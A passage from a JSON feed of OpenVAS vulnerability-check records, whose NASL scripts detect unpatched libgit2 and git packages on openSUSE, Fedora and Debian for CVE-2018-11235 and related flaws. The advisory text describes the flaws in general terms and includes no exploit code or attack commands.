value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-26\", rpm:\"libgit2-26~0.26.6~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-26-debuginfo\", rpm:\"libgit2-26-debuginfo~0.26.6~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-debugsource\", rpm:\"libgit2-debugsource~0.26.6~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-devel\", rpm:\"libgit2-devel~0.26.6~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-26-32bit\", rpm:\"libgit2-26-32bit~0.26.6~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-26-32bit-debuginfo\", rpm:\"libgit2-26-32bit-debuginfo~0.26.6~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-10-15T00:00:00", "type": "openvas", "title": "Fedora Update for libgit2 FEDORA-2018-7d993184f6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-17456", "CVE-2018-10887"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875184", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875184", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_7d993184f6_libgit2_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libgit2 FEDORA-2018-7d993184f6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875184\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-15 07:10:23 +0200 (Mon, 15 Oct 2018)\");\n script_cve_id(\"CVE-2018-17456\", \"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libgit2 FEDORA-2018-7d993184f6\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n script_tag(name:\"affected\", value:\"libgit2 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-7d993184f6\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5GMJJIDNEG42VDOEJZLJOIR6WEXXQGZ5\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"libgit2\", rpm:\"libgit2~0.26.7~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T17:38:39", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-10-27T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for libgit2 (openSUSE-SU-2018:3519-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-10887", "CVE-2018-15501", "CVE-2018-8099"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852103", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852103", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852103\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\", \"CVE-2018-15501\", \"CVE-2018-8099\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-27 06:25:10 +0200 (Sat, 27 Oct 2018)\");\n script_name(\"openSUSE: Security Advisory for libgit2 (openSUSE-SU-2018:3519-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:3519-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-10/msg00078.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the openSUSE-SU-2018:3519-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for libgit2 fixes the following issues:\n\n - CVE-2018-8099: Fixed possible denial of service attack via different\n vectors by not being able to differentiate between these status codes\n (bsc#1085256).\n\n - CVE-2018-11235: With a crafted .gitmodules file, a malicious project can\n execute an arbitrary script on a machine that runs 'git clone\n\n - -recurse-submodules' because submodule 'names' are obtained from this\n file, and then appended to $GIT_DIR/modules, leading to directory\n traversal with '../' in a name. Finally, post-checkout hooks from a\n submodule are executed, bypassing the intended design in which hooks are\n not obtained from a remote server. (bsc#1095219)\n\n - CVE-2018-10887: It has been discovered that an unexpected sign extension\n in git_delta_apply function in delta.c file may have lead to an integer\n overflow which in turn leads to an out of bound read, allowing to read\n before the base object. An attacker could have used this flaw to leak\n memory addresses or cause a Denial of Service. (bsc#1100613)\n\n - CVE-2018-10888: A missing check in git_delta_apply function in delta.c\n file, may lead to an out-of-bound read while reading a binary delta\n file. An attacker may use this flaw to cause a Denial of Service.\n (bsc#1100612)\n\n - CVE-2018-15501: A remote attacker can send a crafted smart-protocol 'ng'\n packet that lacks a '\\0' byte to trigger an out-of-bounds read that\n leads to DoS. (bsc#1104641)\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-1314=1\");\n\n script_tag(name:\"affected\", value:\"libgit2 on openSUSE Leap 42.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-24\", rpm:\"libgit2-24~0.24.1~10.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-24-debuginfo\", rpm:\"libgit2-24-debuginfo~0.24.1~10.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-debugsource\", rpm:\"libgit2-debugsource~0.24.1~10.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-devel\", rpm:\"libgit2-devel~0.24.1~10.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-24-32bit\", rpm:\"libgit2-24-32bit~0.24.1~10.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-24-debuginfo-32bit\", rpm:\"libgit2-24-debuginfo-32bit~0.24.1~10.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T20:08:43", "description": "CVE-2018-15501\nA potential out-of-bounds read when processing a ", "cvss3": {}, "published": "2018-08-26T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for libgit2 (DLA-1477-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-10887", "CVE-2018-15501"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891477", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891477", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891477\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-15501\");\n script_name(\"Debian LTS: Security Advisory for libgit2 (DLA-1477-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-26 00:00:00 +0200 (Sun, 26 Aug 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/08/msg00024.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_tag(name:\"affected\", value:\"libgit2 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n0.21.1-3+deb8u1.\n\nWe recommend that you upgrade your libgit2 packages.\");\n\n script_tag(name:\"summary\", value:\"CVE-2018-15501\nA potential out-of-bounds read when processing a 'ng' smart packet\nmight lead to a Denial of Service.\n\nCVE-2018-10887\nA flaw has been discovered that may lead to an integer overflow which\nin turn leads to an out of bound read, allowing to read before the\nbase object. This might be used to leak memory addresses or cause a\nDenial of Service.\n\nCVE-2018-10888\nA flaw may lead to an out-of-bound read while reading a binary delta\nfile. This might result in a Denial of Service.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libgit2-21\", ver:\"0.21.1-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgit2-dbg\", ver:\"0.21.1-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgit2-dev\", ver:\"0.21.1-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2019-05-29T18:33:03", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-07-06T00:00:00", "type": "openvas", "title": "Fedora Update for libgit2 FEDORA-2018-94eb743dad", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874776", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874776", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_94eb743dad_libgit2_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libgit2 FEDORA-2018-94eb743dad\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874776\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-06 06:04:41 +0200 (Fri, 06 Jul 2018)\");\n script_cve_id(\"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libgit2 FEDORA-2018-94eb743dad\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"libgit2 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-94eb743dad\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JJ2UTQMKUC5NNGLZTBPGXZE5SO6TSRZ7\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"libgit2\", rpm:\"libgit2~0.26.4~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-04T18:56:07", "description": "Etienne Stalmans discovered that git, a fast, scalable, distributed\nrevision control system, is prone to an arbitrary code execution\nvulnerability exploitable via specially crafted submodule names in a\n.gitmodules file.", "cvss3": {}, "published": "2018-05-29T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4212-1 (git - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2019-07-04T00:00:00", "id": "OPENVAS:1361412562310704212", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704212", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4212-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704212\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-11235\");\n script_name(\"Debian Security Advisory DSA 4212-1 (git - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-29 00:00:00 +0200 (Tue, 29 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4212.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB[89]\");\n script_tag(name:\"affected\", value:\"git on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), this problem has been fixed\nin version 1:2.1.4-2.1+deb8u6.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 1:2.11.0-3+deb9u3.\n\nWe recommend that you upgrade your git packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/git\");\n script_tag(name:\"summary\", value:\"Etienne Stalmans discovered that git, a fast, scalable, distributed\nrevision control system, is prone to an arbitrary code execution\nvulnerability exploitable via specially crafted submodule names in a\n.gitmodules file.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"git\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-all\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-arch\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-core\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-cvs\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-daemon-run\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-daemon-sysvinit\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-doc\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-el\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-email\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-gui\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-man\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-mediawiki\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-svn\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"gitk\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"gitweb\", ver:\"1:2.1.4-2.1+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-all\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-arch\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-core\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-cvs\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-daemon-run\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-daemon-sysvinit\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-doc\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-el\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-email\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-gui\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-man\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-mediawiki\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-svn\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"gitk\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"gitweb\", ver:\"1:2.11.0-3+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-07-06T00:00:00", "type": "openvas", "title": "Fedora Update for libgit2 FEDORA-2018-b10e54263a", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874773", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874773", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_b10e54263a_libgit2_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libgit2 FEDORA-2018-b10e54263a\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874773\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-06 06:04:31 +0200 (Fri, 06 Jul 2018)\");\n script_cve_id(\"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libgit2 FEDORA-2018-b10e54263a\");\n 